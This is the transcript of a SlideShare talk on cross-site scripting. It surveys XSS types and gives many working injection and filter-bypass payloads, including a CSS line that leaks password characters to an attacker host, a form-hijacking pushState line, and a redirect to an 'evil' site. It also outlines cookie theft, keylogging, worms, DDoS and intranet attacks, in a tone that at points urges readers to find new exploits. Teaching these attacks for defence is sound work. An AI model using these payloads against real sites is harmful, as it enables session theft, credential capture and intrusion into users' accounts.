Xss is more than a simple threat

  • 6,578 views
Uploaded on

XSS is more than you can imagine. You should take a look.

XSS is more than you can imagine. You should take a look.

More in: Education
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
6,578
On Slideshare
0
From Embeds
0
Number of Embeds
6

Actions

Shares
Downloads
199
Comments
0
Likes
5

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. XSS is more than a simple threat
    • Avădănei Andrei
    • Software Developer, Blogger, Student
    • www.worldit.info
    • @AndreiAvadanei
    • [email_address]
    • #RoCyberCon @20 february
  • 2. Introduction to XSS
    • Short story
    • XSS types
    • Shouts
  • 3. Short story
    • XSS
    • - it's a client side vulnerability
    • - … but can become a server side one
    • - based on Javascript injection
    • - … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on
    • - is the second most popular threat in 2010 (via Infosec & OWASP)
    • - with many resources available on the Internet (use Google)
  • 4. XSS Types
    • Non-persistent (reflected)
    • - the most common type of XSS injection
    • - requires server side interpretation of the query
    • - third-party required
    • Persistent (stored)
    • - the most dangerous type of XSS injection
    • - requires server side interpretation of the query and data storing
    • - third-party may not be required
    • Dom-based
    • - the newest type of XSS injection
    • - requires client side interpretation
    • - usually non-persistent
  • 5. Shouts #1 – XSS Amazon
  • 6. Shouts #2 XSS Facebook
  • 7. Shouts #3 XSS Google
  • 8. Shouts #4 XSS Ebay
  • 9. Shouts #5 More XSS 'ed
    • Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info , PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.
  • 10. Getting XSS 'ed
    • Where?
    • Basic XSS'ing
    • Advanced XSS'ing
    • HTML 5 XSS'ed
    • Bypass XSS protection
  • 11. Where? everywhere
    • Rule : ” Do not trust in anything ever, especially when it comes to user input. ”
    • XSS vulnerabilities can be found in anything that came from user.
    • GET, POST, COOKIE, FILES, SERVER and Headers are main targets.
    • Try to be clever.
  • 12. Basic XSS 'ing
    • <script>alert(1)</script> //basic
    • “ ><script>alert(1)</script> //bypass a open tag
    • <!--<img src=&quot;--><img src=x onerror=alert(1)//&quot;> //bypass & generate a error
    • “ onmouseover=”alert(1)” //all javascript events
    • alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors
    • <script>alert(String.fromCharCode(88,83,83));</script> //bypass quotes filters
    • <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> //unicode injection; utf-8, hex, decimal or octal injection may work
    • <meta http-equiv=&quot;refresh&quot; content=&quot;0;url=http://;javascript:...&quot; // evasion
    • <style type=text/javascript>alert('xss')</style> //javascript injection based on style tag
    • “ ><img src=”x:x” onerror=”alert(0)”> // :D
    • […]
  • 13. Advanced XSS 'ing
    • <META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url= data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K &quot;>
    • <META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL= javascript:alert('XSS ');&quot;>
    • <DIV STYLE=&quot;background-image:00750072006C0028'006a006100760061007300630072006900700074003a0061006c0065007200740028.10270058.1053005300270029'0029&quot;> //background & unicode
    • exp/*<A STYLE='noxss:noxss(&quot;*//*&quot;);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))'> //send IE into a loop
    • <XML ID=&quot;xss&quot;><I><B>&lt;IMG SRC=&quot;javas<!-- -->cript:alert('XSS')&quot;&gt;</B></I></XML><SPAN DATASRC=&quot;#xss&quot; DATAFLD=&quot;B&quot; DATAFORMATAS=&quot;HTML&quot;></SPAN> //xss in xml document
    • x='x61x6cx65x72x74x28x31x29'; new Function(x)(); //something different from every day injections
    • Function('ax6cert(1)')(); // ;)
    • x=eval,1,1,1;1; 1,1,1,b='',1,1,1; 1,1,1,s=''',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection
    • [...]
  • 14. HTML 5 XSS 'ed
    • - new technologies, new problems
    • <video onerror=” javascript:alert(1 )”><source> //new tag
    • <audio onerror=”javascript:alert(1)”><source> //other new tag
    • <form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events
    • <div draggable=”true” ondragstart=”event.dataTransfer.setData('text/plain', ' Evil payload ')”> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes
    • <input type=&quot;text&quot; AUTOFOCUS onfocus=alert(1)>
    • <script>alert(localStorage.getItem('foo'))</script> //access local storage
    • “ ><script>(history.pushState({},”,'index.php'))(document.forms[0].action=' http://maliciousURL ')</script> //conceal the real location and replace it with anything we want. Ex : http://bit.ly/pushStateXSS
  • 15. Bypass XSS protection
    • <img/src=&quot;mars.png&quot;alt=&quot;mars&quot;> //no white spaces, use / instead
    • <object data=&quot; javascript:alert(0 )&quot;> //avoid src
    • <isindex type=image src=1 onerror=alert(1)> //did you know isindex tag?
    • <img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation
    • location=location.hash.slice(1); //avoid the #
    • http://victim.com?param=&quot;;location=location.hash)//#0={};alert(0) //payload after the hash url, victim won't see true payload
    • alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results
    • &quot;&quot;+{toString:alert} or &quot;&quot;+{valueOf:alert} //Executes function without using () or =
    • Future tricks in HTML 5
    • </a onmousemove=&quot;alert(1)&quot;> //html 5 will support events in closed tags
    • <style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure xss-based XSS
    • data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg == //avoid using plain text/html value
    • ?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi
            • via BlackHat Conferences.
  • 16. XSS Injection Exploitation (part 1)
    • Redirection
    • Clickjacking
    • URL Spoofing
    • Session hijacking
    • Cookie stuffing
    • Ad Hijacking
    • CSRF/XSRF attacks
    • History stealling
    • XSS Defacement
    • Key & Mouse logging
  • 17. Redirection & Clickjacking
    • Redirection
    • redirect your victim, ex. document.location = ”http://www.your-evil-site.com”;
    • you create fake traffic
    • popular
    • Clickjacking
    • describes one websites that poses as another.
    • ex. : redirect victim to you onclick event calling
    • used in phishing, gives high credibility
    • extremely popular
  • 18. URL Spoofing
    • popular in phishing
    • the url is user friendly
    • the web page content is hijacked and all information are send to monitored websites by a thief
    • extremely popular
  • 19. Session Hijacking
    • also known as ”Cookie Stealling”
    • usually used with document.cookie
    • help you to gain control over other logged session
    • needs a cookie grabber
    • for instance, XSS in *.yahoo.com can help you to hijack Yahoo accounts
    • extremely popular
  • 20. Cookie stuffing
    • also known as cookie dropping
    • used in blackhat online marketing
    • generates illegitimate affiliate sellings by hijacking cookies
    • uses pop-ups, frames and iframes, images, javascript, stylesheets or flash for accomplishing cookie dropping
    • popular
  • 21. Ad Hijacking
    • used in blackhat online marketing
    • usually requires persistent XSS
    • you can modify ad scripts with your own, getting paid when user clicks on hijacked ads
    • popular
  • 22. CSRF/XSRF attacks
    • unauthorized commands are transmited from an user that website trusts.
    • usually used along with <img src=””.
    • for instance, if <img src=” http://victim.com/?do=logout ” /> is permanently injected and an user acces the page with malformated content, he will be forced to log out.
    • use your imagination, you can do more than that.
  • 23. History Stealling
    • You can find out what sites have been visited by the victim using ” getComputedStyle ” like bellow, after you createad a node with CSS visited selector having a custom known color :
    • document.defaultView.getComputedStyle( link , null).getPropertyValue(&quot;color&quot;);
    • rarely used, but still important
    • it could be done using the full power of HTML 5
  • 24. XSS Defacement
    • looks like server side defaced pages
    • … but it's only a client side deface
    • can create chaos and confusion when they are used for hacking an website
    • invoves changing the HTML content of the page
    • of course, two types : persistent and non-persistent
    • persistent XSS deface are more dangerous than no-persistent
  • 25. Key & Mouse Logging
    • Keylogging
    • - log all keystrokes and send remotely
    • - document.onkeypress / unsafeWindow.onkeypress events
    • - store keystrokes on a local variable and send them regular on a remote server
    • Mouse logging
    • - log all mouse moves and send remotely
    • - document.onmousemove event
    • - dangerous but not so popular
    • 0
  • 26. Tired?
    • You shouldn't, because this is only the beggining...
  • 27. XSS Injection Exploitation (part 2)
    • Browser hijacking
    • Port Scanning
    • DDoS
    • XSS Tunneling
    • Distributed Password Cracking
    • Worms (Spreading)
    • Arbitrary file execution & Privilege escalation
    • Intranet Hacking
  • 28. Browser Hijacking
    • Also known as Tab Hijacking .
    • Highly recommended when hacker want a second shot on victims.
    • XSS Shells usually do for you
    • With iframe injection
    • Working until the victim close the tab.
    • The only drawback with this method is that the URL bar does not change with each click, which may or may not be noticeable to the user.
  • 29. Distributed port scanning
    • Cross domain XMLHttpRequests and WebSockets for performing remote port scanning, but using XSS you can do distributed remote port scanning
    • Latest Firefox, Chrome or Safari supports already these new technolologies
    • This option it's not available yet but it will in the next generation of XSS Shell
    • Firefox & Safari time connection is less than 100 ms
    • 1 victim – 65,000 scanned ports – 6,500 seconds
    • 100 victims - 65,000 scanned ports – 6,5 seconds
    • What about 1,000 or 10,000 victims?
  • 30. DDoS
    • Based on WebSockets
    • Application-level DDoS attacks (layer 7 DDoS)
    • Cross Origin Request (COR) are processed even if the site has restriction and therefore the request will create a load on the server
    • 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with GET requests
    • 1 minute – 600 browser – over 100, 000 requests / minute can be enought to shut down a target
    • We should wait for upgrading the majority of the browsers in the world
    • But blackhat teams will be prepared with amazing tools for DDoS
  • 31. XSS Tunneling
    • XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack.
    • At technical level, it may be an Ajax application. Node.js and Comet Push can make difference in the future XSS Shells.
    • XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies.
    • XSS Tunnel is the standard HTTP proxy which sits on an attacker’s system.
    • You can tunnel all your traffic throught a XSS Channel.
    • You can build your own SSH-like protocol.
    • You can forget about the user session problem when hijacking is not possible because there is an IP adress restriction.
    • Again, your imagination is the limit.
  • 32. Distributed Password Cracking
    • Javascript engines are becoming verry fast.
    • And we have WebWorkers.
    • Password guessing rates in Javascript tools of 100,000 MD5 hashes/second .
    • ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code.
    • But, in these days spreading methods are verry effective. Why not 10,000 compromised machines?
    • Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers.
    • Perform password cracking in background JavaScript threads.
    • Support salted MD5 and SHA hashes.
  • 33. Worms (spreading)
    • One of the most efficient environment for worm propagation - social networking
    • XSS Warhol Worm
    • Linear XSS Worm
    • Hydra XSS Worm
    • Samy (2005) inffected over 1,000,000 users from MySace in 20 hours
    • Yahoo!, Hi5, Twitter and Facebook could easily be next targets on a larger scale.
    • You can simply attach a trojan with your Worm and the risks of creating permanent zombies are growing.
  • 34. Arbitrary file execution
    • In 2008 a vulnerability which affected the IE 7 & IE 8 could execute some arbitrary files using some social engineering skills.
    • During last years few other similar vulnerabilities appeard on Internet jungle.
    • Still, a XSS vulnerability and a CSRF vulnerability in a administrator file editor, which can be bypassed with XMLHttpRequest to the same origin requests an you have the right combination : a XSS vulnerability has become arbitrary code execution ( privilege escalation ).
    • What are you waiting for? Find the next one major privilege escalation vulnerability.
  • 35. Intranet Hacking (part 1)
    • Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?
  • 36. Intranet Hacking (part 2)
    • Exploit procedures :
    • A victim visits a malicious Web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their Web browser.
    • JavaScript malware loads a Java applet revealing the victim’s internal NAT IP address.
    • Then, using the victim’s Web browser as an attack platform, the JavaScript malware identifies and fingerprints Web servers on the internal network.
    • Attacks are initiated against internal or external Web sites, and compromised information is sent outside the network for collection.
  • 37. Intranet Hacking (part 3)
    • Collecting information :
    • Obtaining NAT'ed IP Adress – MyAddress, a special Java Applet
    • Port scanning - <script src= http://ip/ ></script>
    • Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting.
      • <img src=&quot;http://intranet_ip/unique_image_url&quot; onerror=&quot;fingerprint()&quot; />
    • Attack the intranet
      • - try different well-known vulnerabilities
      • - try hacking the web interface of DSL routers
      • - load local files using file:///
      • - get help from XSS Shells
  • 38. Preventing XSS attacks
    • Filtering
    • Input / Output encoding
    • Web browser security
      • - select a safer browser (Chrome)
      • - use a virtual machine for suspicious links
      • - pay more attention to shortened urls
      • - use plugins for better security (like NoScript)
  • 39. XSS it's still a simple threat?
    • :)
  • 40. Question?
    • Thanks. :)
  • 41. Bibliography
    • Experience & Google.